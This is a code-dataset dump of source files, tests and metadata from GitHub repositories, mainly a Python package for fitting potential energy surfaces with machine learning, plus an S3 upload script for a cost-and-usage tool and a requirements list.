category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=RuntimeWarning)\n\nclass Model(ABC):\n \"\"\"\n Abstract class for Machine Learning Models\n\n Subclasses which inherit from Model: \n - GaussianProcess\n - NeuralNetwork\n\n Parameters\n ----------\n dataset_path : str \n A path to a potential energy surface file, which is readable as a\n pandas DataFrame by pandas.read_csv()\n\n input_obj : peslearn object \n InputProcessor object from peslearn. Used for keywords related to machine learning.\n\n molecule_type : str\n Molecule type defining number of each atom in decreasing order. \n AxByCz... where x,y,z are integers. E.g., H2O --> A2B, C2H4 --> A4B2\n\n molecule : peslearn object \n Molecule object from peslearn. Used to automatically define molecule_type\n \"\"\"\n def __init__(self, dataset_path, input_obj, molecule_type=None, molecule=None, train_path=None, test_path=None, valid_path=None):\n self.hyperparameter_space = {}\n data = self.interpret_dataset(dataset_path)\n self.train_path = train_path\n self.test_path = test_path\n self.valid_path = valid_path\n if train_path:\n self.traindata = self.interpret_dataset(train_path)\n self.raw_Xtr = self.traindata.values[:, :-1]\n self.raw_ytr = self.traindata.values[:,-1].reshape(-1,1)\n if test_path:\n self.testdata = self.interpret_dataset(test_path)\n self.raw_Xtest = self.testdata.values[:, :-1]\n self.raw_ytest = self.testdata.values[:,-1].reshape(-1,1)\n if valid_path:\n self.validdata = self.interpret_dataset(valid_path)\n self.raw_Xvalid = self.validdata.values[:, :-1]\n self.raw_yvalid = self.validdata.values[:,-1].reshape(-1,1)\n\n self.dataset = data.sort_values(\"E\")\n self.n_datapoints = self.dataset.shape[0]\n self.raw_X = self.dataset.values[:, :-1]\n self.raw_y = self.dataset.values[:,-1].reshape(-1,1)\n self.input_obj = input_obj\n\n self.pip = False\n if molecule:\n self.molecule_type = molecule.molecule_type\n if self.input_obj.keywords['use_pips'] == 'true':\n self.pip = True\n print(\"Using permutation invariant polynomial transformation for molecule type \", self.molecule_type)\n if molecule_type:\n self.molecule_type = molecule_type\n if self.input_obj.keywords['use_pips'] == 'true':\n self.pip = True\n print(\"Using permutation invariant polynomial transformation for molecule type \", self.molecule_type)\n \n # keyword control\n if self.input_obj.keywords['training_points']:\n self.ntrain = self.input_obj.keywords['training_points']\n else: \n self.ntrain = int(0.8*self.dataset.shape[0])\n if train_path:\n self.ntrain = self.traindata.shape[0]\n if self.ntrain > self.dataset.shape[0]:\n raise Exception(\"Requested number of training points is greater than size of the dataset.\")\n self.hp_maxit = self.input_obj.keywords['hp_maxit']\n\n if (train_path==None and test_path==None):\n self.sampler = self.input_obj.keywords['sampling']\n else:\n self.sampler = 'user_supplied'\n\n # train test split\n if self.input_obj.keywords['n_low_energy_train']:\n n = self.input_obj.keywords['n_low_energy_train']\n sample = DataSampler(self.dataset, self.ntrain, accept_first_n=n)\n else:\n sample = DataSampler(self.dataset, self.ntrain)\n if self.sampler == 'random':\n sample.random()\n elif self.sampler == 'smart_random':\n sample.smart_random()\n elif self.sampler == 'structure_based':\n sample.structure_based()\n elif self.sampler == 'sobol':\n sample.sobol()\n elif self.sampler == 'energy_ordered':\n sample.energy_ordered()\n elif self.sampler == 'user_supplied':\n pass\n else:\n raise Exception(\"Specified sampling method '{}' is not a valid option.\".format(input_obj.keywords['sampling']))\n self.train_indices, self.test_indices = sample.get_indices()\n super().__init__()\n\n def interpret_dataset(self, path):\n with open(path) as f:\n read = f.read()\n if re.findall(xyz_block_regex, read):\n data = load_cartesian_dataset(path)\n else:\n try:\n data = pd.read_csv(path, sep=None, engine='python')\n except: \n raise Exception(\"\"\"Could not read dataset. Check to be sure the path is correct, and it is properly\n formatted. Can either be 1. A csv-style file with the first line being a list of\n arbitrary geometry labels with last column labeled 'E', e.g. r1,r2,r3,...,E or 2.\n A single energy value on its own line followed by a standard cartesian coordinate block\"\"\")\n #try:\n # data = pd.read_csv(path, sep='\\s+', engine='python')\n #try:\n # data = pd.read_csv(path, sep='\\s+')\n #try:\n # data = pd.read_csv(path, sep=None)\n return data\n\n @abstractmethod\n def build_model(self):\n pass\n @abstractmethod\n def save_model(self):\n pass\n @abstractmethod\n def preprocess(self):\n pass\n @abstractmethod\n def split_train_test(self):\n pass\n\n def get_hyperparameters(self):\n \"\"\"\n Returns hyperparameters of this model\n \"\"\"\n return self.hyperparameter_space\n\n def set_hyperparameter(self, key, val):\n \"\"\"\n Set hyperparameter 'key' to value 'val'.\n Parameters\n ---------\n key : str\n A hyperparameter name\n val : obj\n A HyperOpt object such as hp.choice, hp.uniform, etc.\n \"\"\"\n self.hyperparameter_space[key] = val\n\n def compute_error(self, known_y, prediction, yscaler=None, max_errors=None):\n \"\"\"\n Predict the root-mean-square error (in wavenumbers) of model given \n known X,y, a prediction, and a y scaling object, if it exists.\n \n Parameters\n ----------\n known_y : ndarray\n Array of expected model outputs (energies)\n prediction: ndarray\n Array of actual model outputs (energies)\n yscaler: object\n Sci-kit learn scaler object\n max_errors: int\n Returns largest (int) absolute maximum errors \n\n Returns\n -------\n error : float\n Root mean square error in wavenumbers (cm-1)\n \"\"\"\n if known_y.shape != prediction.shape:\n raise Exception(\"Shape of known_y and prediction must be the same\")\n if yscaler:\n raw_y = yscaler.inverse_transform(known_y)\n unscaled_prediction = yscaler.inverse_transform(prediction)\n error = np.sqrt(sklearn.metrics.mean_squared_error(raw_y, unscaled_prediction))\n if max_errors:\n e = np.abs(raw_y - unscaled_prediction) * hartree2cm\n median_error = np.median(e, axis=0)\n largest_errors = np.partition(e, -max_errors, axis=0)[-max_errors:]\n else:\n error = np.sqrt(sklearn.metrics.mean_squared_error(known_y, prediction))\n if max_errors:\n e = np.abs(known_y - prediction) * hartree2cm\n median_error = np.median(e, axis=0)\n largest_errors = np.partition(e, -max_errors, axis=0)[-max_errors:]\n if max_errors:\n return error, median_error, largest_errors\n else:\n return error\n\n" }, { "alpha_fraction": 0.6609442234039307, "alphanum_fraction": 0.6723891496658325, "avg_line_length": 25.846153259277344, "blob_id": "0a652d26583e44eb2460de5c43498f9506e94c7d", "content_id": "16d588acb44e13af8838c31eda75ff8e6f0df7a6", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "permissive", "max_line_length": 90, "num_lines": 26, "path": "/tests/test_template.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest the TemplateProcessor class methods\n\"\"\"\n\nimport peslearn\nimport pytest\nimport re\n\npath = 'tests/datafiles/xyz_template'\ntemplate_object = peslearn.datagen.Template(path)\n\ndef test_extract_xyz():\n x = template_object.extract_xyz()\n assert re.match(peslearn.utils.regex.xyz_block_regex, x)\n \ndef test_header_xyz():\n x = template_object.header_xyz()\n assert x == '# a psi4 input file to text xyz extraction\\n\\nmolecule test {\\n0 1\\n' \n\ndef test_footer_xyz():\n x = template_object.footer_xyz()\n assert x == \"}\\n\\nset basis cc-pvdz\\nset reference rhf\\n\\nenergy('hf')\\n\"\n\ndef test_parse_xyz():\n x, y = template_object.parse_xyz()\n assert ((x == 64) and (y == 115))\n\n" }, { "alpha_fraction": 0.6090154647827148, "alphanum_fraction": 0.6189174056053162, "avg_line_length": 44.904762268066406, "blob_id": "9e784c5ba4cf82433005a7295f17c9f6e94c4753", "content_id": "c5d85d962d570e752f428ff6bb69dc2347d1d0b6", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10604, "license_type": "permissive", "max_line_length": 127, "num_lines": 231, "path": "/peslearn/ml/data_sampler.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nA class for sampling train and test sets from PES datasets \n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom sklearn.model_selection import train_test_split\n\nclass DataSampler(object):\n \"\"\"\n docstring\n \"\"\"\n def __init__(self, dataset, ntrain, accept_first_n=None, rseed=42):\n self.full_dataset = dataset.sort_values(\"E\")\n if accept_first_n:\n if accept_first_n > ntrain:\n raise Exception(\"Number of forced low-energy training points exceeds the indicated total training set size\")\n # remove first n points \n self.dataset = self.full_dataset[accept_first_n:]\n self.ntrain = ntrain - accept_first_n\n else:\n self.ntrain = ntrain\n self.dataset = self.full_dataset\n \n # ensure dataset is float\n self.dataset = self.dataset.astype('float64')\n \n self.dataset_size = self.dataset.shape[0]\n # currently needs to be pandas dataframe \n #if \"E\" in dataset.columns:\n # self.full_dataset = dataset.sort_values(\"E\")\n #else:\n # self.full_dataset = dataset\n self.rseed = rseed\n self.first_n = accept_first_n\n self.train_indices = None\n self.test_indices = None\n\n def set_indices(self, train_indices, test_indices):\n if self.first_n:\n # train/test indices were obtained relative to the dataset that had removed first n datapoints, adjust accordingly \n train_indices += self.first_n \n test_indices += self.first_n \n self.train_indices, self.test_indices = self.include_first_n(train_indices, test_indices)\n else:\n self.train_indices = train_indices\n self.test_indices = test_indices\n\n def get_indices(self):\n return self.train_indices, self.test_indices\n \n def include_first_n(self, train_indices, test_indices):\n \"\"\"\n Force first n lowest energy points to be in training set \n Useful for global-minimum-biased fits for applications such as vibrational computations.\n \"\"\" \n # force first n indices to be in training set\n a = np.arange(self.first_n) \n tmp = np.concatenate((train_indices, a) ,axis=0)\n train_indices = np.unique(tmp) # avoids double counting\n # adjust test set accordingly\n condition = test_indices > self.first_n\n test_indices = np.extract(condition, test_indices)\n return train_indices, test_indices\n \n def random(self):\n \"\"\"\n Randomly sample the dataset to obtain a training set of proper size.\n \"\"\"\n data = self.dataset.values\n X = data[:, :-1]\n y = data[:,-1].reshape(-1,1)\n indices = np.arange(self.dataset_size)\n train_indices, test_indices = train_test_split(indices, train_size=self.ntrain, random_state=self.rseed)\n #if self.first_n:\n # train_indices = self.include_first_n(train_indices)\n\n self.set_indices(train_indices, test_indices)\n\n def smart_random(self):\n \"\"\"\n Choose a random training set that has an energy distribution most resembling that of the full dataset.\n Uses the Chi-Squared method to estimate the similarity of the energy distrubtions.\n \"\"\"\n data = self.dataset.values\n X = data[:, :-1]\n y = data[:,-1].reshape(-1,1)\n full_dataset_dist, binedges = np.histogram(y, bins=10, density=True)\n pvalues = []\n chi = []\n for seed in range(500):\n X_train, X_test, y_train, y_test = train_test_split(X,y,train_size=self.ntrain, random_state=seed)\n train_dist, tmpbin = np.histogram(y_train, bins=binedges, density=True)\n chisq, p = stats.chisquare(train_dist, f_exp=full_dataset_dist)\n chi.append(chisq)\n pvalues.append(p)\n best_seed = np.argmin(chi)\n #best_seed = np.argmax(chi)\n X_train, X_test, y_train, y_test = train_test_split(X,y,train_size=self.ntrain, random_state=best_seed)\n train_dist, tmpbin = np.histogram(y_train, bins=binedges, density=True)\n\n indices = np.arange(self.dataset_size)\n train_indices, test_indices = train_test_split(indices, train_size=self.ntrain, random_state=best_seed)\n self.set_indices(train_indices, test_indices)\n\n\n def energy_ordered(self):\n \"\"\"\n A naive sampling algorithm, where we order the PES dataset\n in terms of increasing energy, and take every nth datapoint such that we \n get approximately the right amount of training points.\n\n A dataset first needs to be sorted by energy before calling.\n Warning: Does not return exact number of desired training points. \n \"\"\"\n interval = round(self.dataset_size / self.ntrain)\n indices = np.arange(self.dataset_size)\n train_indices = indices[0::interval]\n test_indices = np.delete(indices, indices[0::interval])\n self.set_indices(train_indices, test_indices)\n\n def sobol(self, delta=0.002278):\n \"\"\"\n A quasi-random sampling of the PES based on the relative energies.\n First, the PES data is ordered in terms of increasing energy, \n and each energy is shifted by the lowest energy in the dataset so the energy range becomes [0.00, max_E - min_E].\n In each iteration, we draw a random number between 0 and 1 and a random datapoint from the PES.\n We then compare the magnitude of the random number to the expression of the energy: \n (V_max - V + delta) / (V_max + delta) > random_number\n where V is the energy of the random datapoint, V_max is the maximum energy of the dataset, \n and delta is a shift factor (default is 0.002278 Hartrees, 500 cm-1).\n We accept the random datapoint to be a training point if the above condition is satisfied.\n The result is a quasi random series of training points whose distribution DOES NOT follow\n the distribution of the full dataset. Instead, it is biased towards low to mid range energies. \n This is appropriate for accurately modeling a minimum for vibrational applications, for example.\n\n The Sobol expression is as implemented in Manzhos, Carrington J Chem Phys 145, 2016, and papers they cite.\n \"\"\"\n # Problems:\n # 1. not easily reproducible with a random seed.\n # 2. Scaling. could in principle improve scaling by doing minibatches in while loop... e.g. test.sample(n=minibatch)\n data = self.dataset.sort_values(\"E\")\n data['E'] = data['E'] - data['E'].min()\n \n max_e = data['E'].max()\n denom = (1 / (max_e + delta))\n train_indices = []\n indices = np.arange(data.shape[0])\n while len(train_indices) < self.ntrain:\n # randomly draw a PES datapoint \n rand_point = data.sample(n=1)\n rand_E = rand_point['E'].values\n condition = (max_e - rand_E + delta) * denom\n rand = np.random.uniform(0.0,1.0)\n # if this datapoint is already accepted into training set, skip it\n # (Not needed, as long as there are not equivalent geometries) \n #if any((rand_point.values == x).all() for x in train): \n # continue \n if condition > rand:\n train_indices.append(rand_point.index[0])\n data = data.drop(rand_point.index[0])\n test_indices = np.delete(indices, indices[train_indices])\n\n self.set_indices(train_indices, test_indices)\n\n\n def structure_based(self):\n \"\"\"\n Sample the geometries according to their L2 norms from one another.\n Based on the algorithm described in Dral et al, J Chem Phys, 146, 244108, 2017\n and references therein. Please cite appropriately if used. \n First the point closest to the global minimum is taken as the first training point.\n The second training point is that which is 'furthest' from the first.\n Each additional training point is added by \n 1. For each new training point candidate, compute shortest distance \n to every point in training set.\n 2. Find the training point candidate with the largest shortest distance to the training set\n 3. Add this candidate to the training set, remove from the test set.\n 4. Repeat 1-3 until desired number of points obtained.\n \"\"\"\n data = self.dataset\n train = []\n train.append(data.values[0])\n\n def norm(train_point, data=data):\n \"\"\" Computes norm between training point geometry and every point in dataset\"\"\"\n tmp1 = np.tile(train_point[:-1], (data.shape[0],1))\n diff = tmp1 - data.values[:,:-1]\n norm_vector = np.sqrt(np.einsum('ij,ij->i', diff, diff))\n return norm_vector\n\n # accept farthest point from 1st training point as the 2nd training point\n norm_vector_1 = norm(train[0])\n idx = np.argmax(norm_vector_1)\n newtrain = data.values[idx]\n train.append(newtrain)\n\n # create norm matrix, whose rows are all the norms to 1st and 2nd training points \n norm_vector_2 = norm(train[1])\n norm_matrix = np.vstack((norm_vector_1, norm_vector_2))\n\n # find the minimum value along the columns of this 2xN array of norms\n min_array = np.amin(norm_matrix, axis=0)\n train_indices = []\n train_indices.append(0)\n train_indices.append(idx)\n\n while len(train) < self.ntrain:\n # min_array contains the smallest norms into the training set, by datapoint.\n # We take the largest one.\n idx = np.argmax(min_array)\n train_indices.append(idx)\n new_geom = data.values[idx]\n train.append(new_geom)\n # update norm matrix with the norms of newly added training point\n norm_vec = norm(train[-1])\n stack = np.vstack((min_array, norm_vec))\n min_array = np.amin(stack, axis=0)\n\n indices = np.arange(self.dataset_size)\n test_indices = np.delete(indices, indices[train_indices])\n train_indices = np.asarray(train_indices)\n # do not sort. This ruins the building-up method of the PES\n #train_indices = np.sort(train_indices)\n self.set_indices(train_indices, test_indices)\n\n def energy_gaussian(self):\n \"\"\"\n Heavily biases towards low energy region\n \"\"\"\n pass\n" }, { "alpha_fraction": 0.5360763072967529, "alphanum_fraction": 0.6475849747657776, "avg_line_length": 41.97435760498047, "blob_id": "a385b80b56c2eae47151501b3d9c33c749971d18", "content_id": "afb39fc632529ac568ba337245e16da6e9e06bb9", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1677, "license_type": "permissive", "max_line_length": 162, "num_lines": 39, "path": "/tests/test_outputfile.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest the OutputFile class methods\n\"\"\"\nimport numpy as np\nimport peslearn\nimport pytest\nimport re\n\n\n# open an output file\npath = 'tests/datafiles/molpro_water_gradient'\noutputfile = peslearn.datagen.OutputFile(path)\n\ndef test_extract_energy_with_regex():\n energy = outputfile.extract_energy_with_regex(\"!CCSD\\(T\\) total energy\\s+(-?\\d+.\\d+)\")\n assert energy == -76.241305026974\n\ndef test_extract_energy_with_cclib():\n energy = outputfile.extract_energy_with_cclib(\"ccenergies\")\n #cclib converts energies to eV, so you lose precision\n assert energy.round(8) == -76.24130503\n\ndef test_extract_cartesian_gradient_with_regex():\n gradient = outputfile.extract_cartesian_gradient_with_regex(\"Atom\\s+dE/dx\\s+dE/dy.+\", \"Reading points\", \"\\s+\\d+\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\\s+(-?\\d+\\.\\d+)\")\n test = np.array([[ 0.000000000 , 0.000000025 , 0.000000007 ], \n [ 0.000000000 , -0.000000005 , 0.000000007 ],\n [-0.000000000 , -0.000000019 , -0.000000013 ]])\n assert np.allclose(gradient,test)\n\n# cclib currently has poor gradient support, only psi4, qchem, and gaussian well supported. Molpro works in fringe cases \n# have to test with qchem for now\npath_2 = 'tests/datafiles/qchem_water_gradient'\noutputfile_2 = peslearn.datagen.OutputFile(path_2)\ndef test_extract_cartesian_gradient_with_cclib():\n gradient = outputfile_2.extract_cartesian_gradient_with_cclib()\n test = np.array([[ 0.0000000, 0.000000, 0.1273959],\n [-0.0917225, -0.000000, -0.063698 ],\n [ 0.0917225, 0.000000, -0.063698 ]])\n assert np.allclose(gradient, test)\n\n" }, { "alpha_fraction": 0.5658578872680664, "alphanum_fraction": 0.566724419593811, "avg_line_length": 28.564102172851562, "blob_id": "a9ffbe304a4eb6807133ac78a4a6b24e9e4af8d1", "content_id": "3416028eb9bdabd81d568e50b46d50027fd65159", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2308, "license_type": "permissive", "max_line_length": 90, "num_lines": 78, "path": "/peslearn/datagen/template.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nContains the TemplateProcessor class for handling template input file data\n\"\"\"\n\nfrom ..utils import regex\nimport re\n\nclass Template(object):\n \"\"\"\n A class for handling template input files for electronic structure theory codes\n Parameters\n ----------\n template_path : str\n A path to a template input file \n \"\"\"\n\n def __init__(self, template_path):\n with open(template_path, 'r') as f:\n template = f.read()\n self.template = template\n self.start, self.end = self.parse_xyz()\n\n def parse_xyz(self):\n \"\"\"\n Locates the file positions of the xyz geometry.\n Returns\n -------\n bounds : tuple\n A tuple of size two: start and end string positions of the xyz geometry block \n \"\"\" \n iter_matches = re.finditer(regex.xyz_block_regex, self.template, re.MULTILINE)\n matches = [match for match in iter_matches]\n if matches is None:\n raise Exception(\"No XYZ geometry found in template input file\")\n # only find last xyz if there are multiple\n # grab string positions of xyz coordinates\n start = matches[-1].start() \n end = matches[-1].end() \n return start, end \n\n def header_xyz(self):\n \"\"\"\n The header of the xyz template input file (all text before the geometry) \n\n Returns\n -------\n header : str\n All template input file text before xyz geometry specification \n \"\"\"\n header = self.template[:self.start]\n return header \n\n def footer_xyz(self):\n \"\"\"\n The footer of the xyz template input file (all text after the geometry) \n\n Returns\n -------\n header : str\n All template input file text after xyz geometry specification \n \"\"\"\n footer = self.template[self.end:]\n return footer\n\n def extract_xyz(self):\n \"\"\"\n Extracts an xyz-style geometry block from a template input file \n\n Returns\n ------- \n XYZ : str\n An xyz geometry of the form:\n atom_label x_coord y_coord z_coord \n atom_label x_coord y_coord z_coord \n ...\n \"\"\"\n xyz = self.template[self.start:self.end]\n return xyz\n\n\n" } ]
34
chahatd/aws-cost-and-usage
https://github.com/chahatd/aws-cost-and-usage
e45c681dd24f046a149e2f41289a13259ba0e871
6d587bb912f459ecc5f6445c2d278866a3964f48
76ff3052666623778ccff89253c4945a59c1eede
refs/heads/master
2023-06-26T07:27:45.715562
2021-08-02T08:21:57
2021-08-02T08:21:57
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6784741282463074, "alphanum_fraction": 0.6948229074478149, "avg_line_length": 30.913043975830078, "blob_id": "009da0f4f8a1fb493ed143c3156ab37be7b92ed2", "content_id": "74db25c41d3d486a9a357d6152c6bf7f04a436a4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1468, "license_type": "permissive", "max_line_length": 118, "num_lines": 46, "path": "/action/run.py", "repo_name": "chahatd/aws-cost-and-usage", "src_encoding": "UTF-8", "text": "import os\nimport boto3\nimport logging\n\nfrom botocore.exceptions import NoCredentialsError\n\n# Set logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nLAMBDA_FUNCTION_CODE_ZIP_FILE_NAME = 'lambda_function_code.zip'\nLAMBDA_FUNCTION_CODE_ZIP_FILE_PATH = \"{0}/{1}\".format(os.environ['SOURCE_DIR'], LAMBDA_FUNCTION_CODE_ZIP_FILE_NAME)\nAUTO_DEPLOYMENT_YAML_FILE_NAME = 'auto-deployment.yaml'\nAUTO_DEPLOYMENT_YAML_FILE_PATH = \"{0}/{1}\".format(os.environ['SOURCE_DIR'], AUTO_DEPLOYMENT_YAML_FILE_NAME)\n\n\ndef empty_s3_bucket(bucket):\n s3resource = boto3.resource('s3')\n bucket = s3resource.Bucket(bucket)\n\n bucket.objects.delete()\n print(\"S3 bucket is now empty\")\n\n\ndef upload_to_aws(local_file, bucket, s3_file):\n s3client = boto3.client('s3')\n\n try:\n s3client.upload_file(local_file, bucket, s3_file, ExtraArgs={'ACL': 'public-read'})\n print(\"{} was uploaded successfully\".format(s3_file))\n except FileNotFoundError:\n print(\"The file {} was not found\".format(local_file))\n exit(1)\n except NoCredentialsError:\n print(\"Credentials not available\")\n exit(1)\n\n\ndef main():\n empty_s3_bucket(os.environ['AWS_S3_BUCKET'])\n upload_to_aws(LAMBDA_FUNCTION_CODE_ZIP_FILE_PATH, os.environ['AWS_S3_BUCKET'], LAMBDA_FUNCTION_CODE_ZIP_FILE_NAME)\n upload_to_aws(AUTO_DEPLOYMENT_YAML_FILE_PATH, os.environ['AWS_S3_BUCKET'], AUTO_DEPLOYMENT_YAML_FILE_NAME)\n\n\nif __name__ == '__main__':\n main()\n" } ]
1
baky0905/azure-text-analytics
https://github.com/baky0905/azure-text-analytics
ff706d4189b7b6642fe95b79de6fd1897d1ff78b
49584d81e9fd5d4f438b8437f871f85f3c0b24ea
f0e832df31db8c9bdfaf7268da639be0f480e9e0
refs/heads/main
2023-06-17T06:41:27.086387
2021-07-11T20:37:46
2021-07-11T20:37:46
385,041,057
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7665847539901733, "alphanum_fraction": 0.7665847539901733, "avg_line_length": 28.071428298950195, "blob_id": "cecce9e14d93f97afaadefdb746b3ff87f3010b5", "content_id": "15f0282f0d8c10e14cb792c74941ae5e137d04d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 407, "license_type": "no_license", "max_line_length": 56, "num_lines": 14, "path": "/utils.py", "repo_name": "baky0905/azure-text-analytics", "src_encoding": "UTF-8", "text": "from azure.core.credentials import AzureKeyCredential\nfrom azure.ai.textanalytics import TextAnalyticsClient\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\n\ndef authenticate_client():\n ta_credential = AzureKeyCredential(os.getenv(\"KEY\"))\n text_analytics_client = TextAnalyticsClient(\n endpoint=os.getenv('ENDPOINT'),\n credential=ta_credential)\n return text_analytics_client\n" }, { "alpha_fraction": 0.5074940919876099, "alphanum_fraction": 0.5153825879096985, "avg_line_length": 29.918699264526367, "blob_id": "cb15777b34f59e948290fbb918c96a80e1e9e7f8", "content_id": "9b5a059bfa1a979b7cc96216b9e77f065134b235", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3803, "license_type": "no_license", "max_line_length": 96, "num_lines": 123, "path": "/main.py", "repo_name": "baky0905/azure-text-analytics", "src_encoding": "UTF-8", "text": "from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom utils import authenticate_client\nfrom dotenv import load_dotenv\nimport os\nimport logging\nfrom opencensus.ext.azure.log_exporter import AzureLogHandler\n\nload_dotenv()\n\napp = FastAPI()\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(10)\nlogger.addHandler(AzureLogHandler(\n connection_string=os.getenv(\"INSTRUNENTATION_KEY\")))\n\n\nclass Model(BaseModel):\n text_to_analyze: list\n\n\[email protected](\"/\")\ndef sentiment_analysis_example(documents: Model):\n \"\"\"[summary]\n\n Args:\n documents (Model): [description]\n\n Returns:\n [type]: [description]\n \"\"\"\n\n client = authenticate_client()\n\n response_dict = {}\n\n for idx, document in enumerate(documents.text_to_analyze):\n response = client.analyze_sentiment(\n documents=documents.text_to_analyze)\n\n response_dict[response[idx][\"id\"]] = {\n \"sentiment\": response[idx][\"sentiment\"],\n \"confidence_scores\": response[idx][\"confidence_scores\"],\n \"sentences\": [sentence[\"text\"] for sentence in response[idx][\"sentences\"]]\n }\n\n log_data = {\n \"custom_dimensions\":\n {\n \"text_sentiment\": response[idx][\"sentiment\"]\n }\n }\n logger.info('Text Processed Succesfully', extra=log_data)\n\n return response_dict\n\n # [\n # {\n # \"id\": \"0\",\n # \"sentiment\": \"mixed\",\n # \"warnings\": [],\n # \"statistics\": null,\n # \"confidence_scores\": {\n # \"positive\": 0.5,\n # \"neutral\": 0,\n # \"negative\": 0.5\n # },\n # \"sentences\": [\n # {\n # \"text\": \"I think this is super cool.\",\n # \"sentiment\": \"positive\",\n # \"confidence_scores\": {\n # \"positive\": 1,\n # \"neutral\": 0,\n # \"negative\": 0\n # },\n # \"length\": 27,\n # \"offset\": 0,\n # \"mined_opinions\": []\n # },\n # {\n # \"text\": \"But not as cool as you.\",\n\n # print(\"Document Sentiment: {}\".format(response.sentiment))\n # print(\"Overall scores: positive={0:.2f}; neutral={1:.2f}; negative={2:.2f} \\n\".format(\n # response.confidence_scores.positive,\n # response.confidence_scores.neutral,\n # response.confidence_scores.negative,\n # ))\n # for idx, sentence in enumerate(response.sentences):\n # print(\"Sentence: {}\".format(sentence.text))\n # print(\"Sentence {} sentiment: {}\".format(idx+1, sentence.sentiment))\n # print(\"Sentence score:\\nPositive={0:.2f}\\nNeutral={1:.2f}\\nNegative={2:.2f}\\n\".format(\n # sentence.confidence_scores.positive,\n # sentence.confidence_scores.neutral,\n # sentence.confidence_scores.negative,\n # ))\n\n\n# def analyze_text(text: Model):\n# response = {\n# \"sentiment\": [],\n# \"keyphrases\": []\n# }\n# no_of_text = len(text.text_to_analyze)\n# for i in range(no_of_text):\n# document = {\n# \"documents\": [\n# {\n# \"id\": i+1,\n# \"language\": \"en\",\n# \"text\": text.text_to_analyze[i]\n# }\n# ]\n# }\n# sentiment = utils.call_text_analytics_api(\n# headers, document, endpoint='sentiment')\n# keyphrases = utils.call_text_analytics_api(\n# headers, document, endpoint='keyPhrases')\n# response[\"sentiment\"].append(sentiment[\"documents\"][0])\n# response[\"keyphrases\"].append(keyphrases[\"documents\"][0])\n# return response\n" }, { "alpha_fraction": 0.4987804889678955, "alphanum_fraction": 0.704878032207489, "avg_line_length": 16.826086044311523, "blob_id": "8c14b8d32d0db3c1f18d5409256c8b0f2922b527", "content_id": "1487cc16d3cde26630ae5603037b62f1594d490e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 820, "license_type": "no_license", "max_line_length": 32, "num_lines": 46, "path": "/requirements.txt", "repo_name": "baky0905/azure-text-analytics", "src_encoding": "UTF-8", "text": "asgiref==3.4.1\nautopep8==1.5.7\nazure-ai-textanalytics==5.1.0\nazure-common==1.1.27\nazure-core==1.16.0\ncachetools==4.2.2\ncertifi==2021.5.30\nchardet==4.0.0\nclick==8.0.1\nfastapi==0.66.0\ngoogle-api-core==1.31.0\ngoogle-auth==1.32.1\ngoogleapis-common-protos==1.53.0\ngunicorn==20.0.4\nh11==0.12.0\nhttptools==0.2.0\nidna==2.10\nisodate==0.6.0\nmsrest==0.6.21\noauthlib==3.1.1\nopencensus==0.7.13\nopencensus-context==0.1.2\nopencensus-ext-azure==1.0.8\npackaging==21.0\nprotobuf==3.17.3\npsutil==5.8.0\npyasn1==0.4.8\npyasn1-modules==0.2.8\npycodestyle==2.7.0\npydantic==1.8.2\npyparsing==2.4.7\npython-dotenv==0.18.0\npytz==2021.1\nPyYAML==5.4.1\nrequests==2.25.1\nrequests-oauthlib==1.3.0\nrsa==4.7.2\nsix==1.16.0\nstarlette==0.14.2\ntoml==0.10.2\ntyping-extensions==3.10.0.0\nurllib3==1.26.6\nuvicorn==0.14.0\nuvloop==0.15.2\nwatchgod==0.7\nwebsockets==9.1\n" } ]
3
antekirtt/thesis
https://github.com/antekirtt/thesis
c1f784f546f61b141bae6fa82e8bdbe35b1f731a
6763a0cdb775bdfa7f1bd6a1add1a1462b798a49
d93f3651a172aecb1ba310c3d9a60c479e036e5c
refs/heads/master
2021-01-17T15:34:24.960963
2016-12-01T21:51:03
2016-12-01T21:51:03
54,878,835
0
1
null
null
null
null
null
